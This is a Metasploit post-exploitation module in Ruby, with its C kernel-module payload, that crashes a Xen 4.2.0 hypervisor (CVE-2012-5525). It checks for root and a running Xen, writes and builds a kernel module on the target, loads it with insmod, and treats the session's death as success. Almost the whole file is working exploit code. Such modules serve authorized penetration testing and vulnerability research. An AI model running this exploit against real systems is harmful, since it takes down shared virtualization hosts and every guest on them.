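##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module that builds an out-of-tree Linux kernel module under WritableDir
# on the target and loads it with insmod; the module issues a Xen hypercall
# that crashes a Xen 4.2.0 hypervisor (CVE-2012-5525). Success is inferred
# from the session dying. Everything written to WritableDir (C source,
# Makefile, build products) is left behind on the target.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linux DoS Xen 4.2.0 2012-5525',
        'Description' => %q{
          This module causes a hypervisor crash in Xen 4.2.0 when invoked from a
          paravirtualized VM, including from dom0. Successfully tested on Debian 7
          3.2.0-4-amd64 with Xen 4.2.0.
        },
        'References' => [ ['CVE', '2012-5525'] ],
        'License' => MSF_LICENSE,
        'Author' => [
          'Christoph Sendner <christoph.sendner[at]stud-mail.uni-wuerzburg.de>',
          'Aleksandar Milenkoski <aleksandar.milenkoski[at]uni-wuerzburg.de>'
        ],
        'Platform' => [ 'linux' ],
        'Arch' => [ARCH_X64],
        'SessionTypes' => ['shell'],
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'Reliability' => [],
          # write_files drops a .c file and a Makefile into WritableDir and
          # do_insmod builds a .ko next to them; nothing removes them, so the
          # module leaves artifacts on disk in addition to log entries.
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('WritableDir', [true, 'A directory for storing temporary files on the target system', '/tmp'])
    ])
  end

  # Module entry point: verify prerequisites, write the build files, build and
  # load the kernel module, then check whether the session is still alive.
  def run
    # Random directory name so repeated runs do not collide with each other.
    @rand_folder = '/' + Rex::Text.rand_text_alpha(7..11).to_s
    @writeable_folder = datastore['WritableDir'].to_s + @rand_folder

    # Testing requirements
    print_status('Detecting requirements...')
    return unless requirements_met?

    # Creating and writing random paths and files
    vprint_status('Creating random file and folder names')
    write_files

    # Execute make and insmod
    do_insmod

    # Testing success of DoS
    test_success
  end

  ##
  # Test all requirements, stopping at the first one that fails:
  # - root privileges
  # - build-essentials
  # - xen environment (installed, not necessarily running)
  # - xen running
  # - xen version (DoS only works on specific versions)
  ##
  # @return [Boolean] true only when every check passed
  def requirements_met?
    unless is_root?
      print_error('Root access is required')
      return false
    end
    print_good('Detected root privilege')

    unless build_essential?
      print_error('No build-essential package found')
      return false
    end
    print_good('Detected build-essential')

    unless xen?
      print_error('Running Xen was not found')
      return false
    end
    print_good('Detected Xen')

    unless xen_running?
      print_error('Xen is not running')
      return false
    end
    print_good('Detected running Xen')

    unless right_xen_version?
      print_error('Incorrect Xen version running')
      return false
    end
    print_good('Detected correct Xen version')

    true
  end

  ##
  # Checks for build essentials
  # - Required for building a lkm
  # - checks for gcc/g++, make and linux-headers
  # - commands sh-conform
  # - the linux-headers test goes through dpkg, so it only works on
  #   Debian-derived targets
  ##
  # @return [Boolean] true when the shell test printed OK
  def build_essential?
    # Each `$( which ... )` is quoted on purpose: unquoted, a missing tool
    # expands to the one-argument form `[ -s ]`, which POSIX sh evaluates as
    # true and the toolchain would be reported as present.
    check_command = 'if [ -s "$( which gcc )" ] && '
    check_command << '[ -s "$( which g++ )" ] && '
    check_command << '[ -s "$( which make )" ] && '
    check_command << '[ "$( dpkg -l | grep linux-headers-$(uname -r) )" != "" ] ;'
    check_command << 'then echo OK;'
    check_command << 'fi'

    cmd_exec(check_command).delete("\r") == 'OK'
  end

  ##
  # Checks for an installed Xen Hypervisor
  # - Looks for Xen in lsmod, lscpu, dmesg and for the xl tool
  # - any one hit is enough
  # - commands sh-conform
  ##
  # @return [Boolean] true when the shell test printed OK
  def xen?
    check_command = 'if [ "$( lsmod | grep xen )" != "" ] || '
    check_command << '[ "$( lscpu | grep Xen )" != "" ] || '
    check_command << '[ "$( dmesg | grep xen )" != "" ] || '
    check_command << '[ "$( which xl )" != "" ] ;'
    check_command << 'then echo OK;'
    check_command << 'fi'

    cmd_exec(check_command).delete("\r") == 'OK'
  end

  ##
  # Checks for running Xen
  # - Host eventually has Xen installed, but not running
  # - DoS needs a running Xen on Host
  # - presence of the xenstored pid file is taken as "running"
  ##
  # @return [Boolean] true when the shell test printed OK
  def xen_running?
    check_command = 'if [ -f /var/run/xenstored.pid -o -f /var/run/xenstore.pid ] ; then echo OK; fi'

    cmd_exec(check_command).delete("\r") == 'OK'
  end

  ##
  # Checks for Xen Version
  # - Most DoS of Xen require a specific version - here: 4.2.0
  # - commands need running Xen - so execute after test for xen
  # - only the digits of each `xl info` field are kept, and the result must
  #   equal the string '4.2.0' exactly
  ##
  # @return [Boolean] true when the assembled version string is '4.2.0'
  def right_xen_version?
    cmd_major = "xl info | grep xen_major | grep -o '[0-9]*'"
    xen_major = cmd_exec(cmd_major).delete("\r")
    cmd_minor = "xl info | grep xen_minor | grep -o '[0-9]*'"
    xen_minor = cmd_exec(cmd_minor).delete("\r")
    cmd_extra = "xl info | grep xen_extra | grep -o '[0-9]*'"
    xen_extra = cmd_exec(cmd_extra).delete("\r")

    xen_version = xen_major + '.' + xen_minor + '.' + xen_extra

    print_status('Xen Version: ' + xen_version)

    xen_version == '4.2.0'
  end

  ##
  # Creating and writing files:
  # - c_file for c-code
  # - Makefile
  # - both land in a fresh random directory under WritableDir and are not
  #   cleaned up afterwards
  ##
  def write_files
    @c_name = Rex::Text.rand_text_alpha(7..11).to_s
    @c_file = "#{@writeable_folder}/#{@c_name}.c"
    @make_file = "#{@writeable_folder}/Makefile"

    vprint_status("Creating folder '#{@writeable_folder}'")
    cmd_exec("mkdir #{@writeable_folder}")

    vprint_status("Writing C code to '#{@c_file}'")
    write_file(@c_file, c_code)
    vprint_status("Writing Makefile to '#{@make_file}'")
    write_file(@make_file, make_code)
  end

  ##
  # Compiling and execute LKM
  # - `cd` and `make` are separate cmd_exec calls, so this relies on the
  #   working directory persisting between commands; the module is limited to
  #   the 'shell' session type, which is presumably why that holds — verify
  #   before widening SessionTypes
  ##
  def do_insmod
    cmd_exec("cd #{@writeable_folder}")
    vprint_status('Making module...')
    cmd_exec('make')
    vprint_status("Insmod '#{@writeable_folder}/#{@c_name}.ko'")
    cmd_exec("insmod #{@writeable_folder}/#{@c_name}.ko")
  end

  ##
  # Test for success via ssh-error exception
  # - Host down => ssh-error => DoS successful
  # - success is recognised only by the exact message is_root? raises when
  #   the UID cannot be read; any other RuntimeError is re-raised and, via
  #   ensure, reported as a failure first
  ##
  def test_success
    successful = false
    begin
      is_root?
    rescue RuntimeError => e
      successful = true if e.message == 'Could not determine UID: ""'
      raise unless successful
    ensure
      if successful
        print_good('DoS was successful!')
      else
        print_error('DoS has failed')
      end
    end
  end

  ##
  # Returns Makefile to compile
  # - LKMs need a Makefile
  # - Needs the linux-headers, make and gcc
  # - recipe lines use an escaped tab, which the squiggly heredoc keeps
  ##
  # @return [String] Makefile contents for the random module name
  def make_code
    m = <<~END
      obj-m := #{@c_name}.o

      EXTRA_CFLAGS+= -save-temps

      all:
      \t$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

      clean:
      \t$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
    END
    m
  end

  ##
  # Returns the c-Code to compile
  # - Contains the essential bug to crash Xen
  # - Here: Force a segmentation fault via hypercall, which crashes the host
  ##
  # @return [String] kernel module source
  def c_code
    c = <<~END
      #undef __KERNEL__
      #define __KERNEL__
      #undef MODULE
      #define MODULE
      #include <linux/module.h>
      #include <asm/xen/hypercall.h>
      MODULE_LICENSE("GPL");
      static int __init lkm_init(void)
      {
      struct mmuext_op op;
      int status;
      op.cmd = 16; /*MMUEXT_CLEAR_PAGE*/
      op.arg1.mfn = 0x0EEEEE; /*A large enough MFN*/
      HYPERVISOR_mmuext_op(&op, 1, &status, DOMID_SELF);
      return 0;
      }
      static void __exit lkm_cleanup(void)
      {
      }
      module_init(lkm_init);
      module_exit(lkm_cleanup);
    END
    c
  end
end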